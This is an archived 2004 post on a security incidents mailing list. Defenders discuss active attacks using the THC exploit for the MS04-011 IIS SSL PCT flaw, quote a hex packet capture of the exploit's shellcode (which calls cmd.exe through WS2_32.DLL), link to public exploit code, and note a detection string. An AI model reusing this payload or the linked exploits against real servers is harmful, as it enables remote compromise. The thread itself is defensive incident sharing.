Re: Heads up: Looks like MS04-011 exploit is being tried againstwww.domain

From: Clint Bodungen (clint_at_secureconsulting.com)
Date: 04/28/04

  • Next message: Thamer Al-Harbash: "RE: Massive increase in spam volume?"
    To: <incidents@securityfocus.com>
    Date: Wed, 28 Apr 2004 10:13:44 -0500
    
    

    Just FYI: I've been able to successfully predict many of these incidents by
    regularly monitoring several lists and sites that new exploits get posted to
    such
    as the full-disclosure mailing list. It never fails... a new exploit
    is posted on these lists and anywhere from hours do a few days later
    we get a flood of related incidents. I have scripts that monitor about 50
    different locations for these exploits and the results are at
    http://rootexploit.net/. They update every hour and we usually discuss
    them in the forum and send out advance notices throughout all the members.
    We're talking about using this advance notice to either start writing
    advance Snort signatures for these exploits that are released in preparation
    for possible attack waves (or at least prompt a few intrested members to).

    ----- Original Message -----
    From: <falcon@secureconsulting.net>
    To: "James Riden o" <j.riden@massey.ac.nz>
    Cc: <incidents@securityfocus.com>
    Sent: Tuesday, April 27, 2004 9:54 AM
    Subject: Re: Heads up: Looks like MS04-011 exploit is being tried
    againstwww.domain

    > This appears to be from the THC exploit for SSL PCT released last week.
    > http://packetstormsecurity.nl/filedesc/THCIISSLame.c.html
    > Running strings against the binary and grep'ing for "THCOWNZIIS!"
    > indicated the match.
    >
    > Also be aware that what appears to be PERL-based exploit code is now
    > readily available, too, for this vulnerability.
    > http://www.k-otik.com/exploits/04242004.iis5x_ssl_pct.pm.php
    >
    > Our experience testing the original THC code indicated that vulnerable
    > systems could be compromised in a matter of seconds.
    >
    > >
    > > Seen as long ago as 25/04/2004. Haven't seen it used against any other
    > > servers here, so it's obviously targetted in some way. Example packet
    > > capture:
    > >
    > > 000 : 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
    > > 010 : 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
    > > 020 : BE 98 EB 25 03 E7 3E D8 08 24 02 06 6C 59 6C 59 ...%..>..$..lYlY
    > > 030 : F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_
    > > 040 : 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].
    > > 050 : ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...
    > > 060 : 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K
    > > 070 : 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..
    > > 080 : 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...
    > > 090 : 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u
    > > 0a0 : E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..
    > > 0b0 : 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...
    > > 0c0 : 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S
    > > 0d0 : FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...
    > > 0e0 : 89 CE 31 DB 53 53 53 53 56 46 56 FF D0 89 C7 55 ..1.SSSSVFV....U
    > > 0f0 : 58 66 89 30 6A 10 55 57 FF 55 E0 8D 45 88 50 FF Xf.0j.UW.U..E.P.
    > > 100 : 55 E8 55 55 FF 55 EC 8D 44 05 0C 94 53 68 2E 65 U.UU.U..D...Sh.e
    > > 110 : 78 65 68 5C 63 6D 64 94 31 D2 8D 45 CC 94 57 57 xeh\cmd.1..E..WW
    > > 120 : 57 53 53 FE CA 01 F2 52 94 8D 45 78 50 8D 45 88 WSS....R..ExP.E.
    > > 130 : 50 B1 08 53 53 6A 10 FE CE 52 53 53 53 55 FF 55 P..SSj...RSSSU.U
    > > 140 : F0 6A FF FF 55 E4 .j..U.
    > >
    > > --
    > > James Riden / j.riden@massey.ac.nz / Systems Security Engineer
    > > GPG public key available at: http://www.massey.ac.nz/~jriden/
    > > This post does not necessarily represent the views of my employer.
    > >
    > >
    >
    > --------------------------------------------------------------------------
    -
    >
    > --------------------------------------------------------------------------

    --
    > >
    > >
    >
    >
    > --------------------------------------------------------------------------
    -
    > --------------------------------------------------------------------------
    --
    >
    >
    ---------------------------------------------------------------------------
    ----------------------------------------------------------------------------
    

  • Next message: Thamer Al-Harbash: "RE: Massive increase in spam volume?"

    Relevant Pages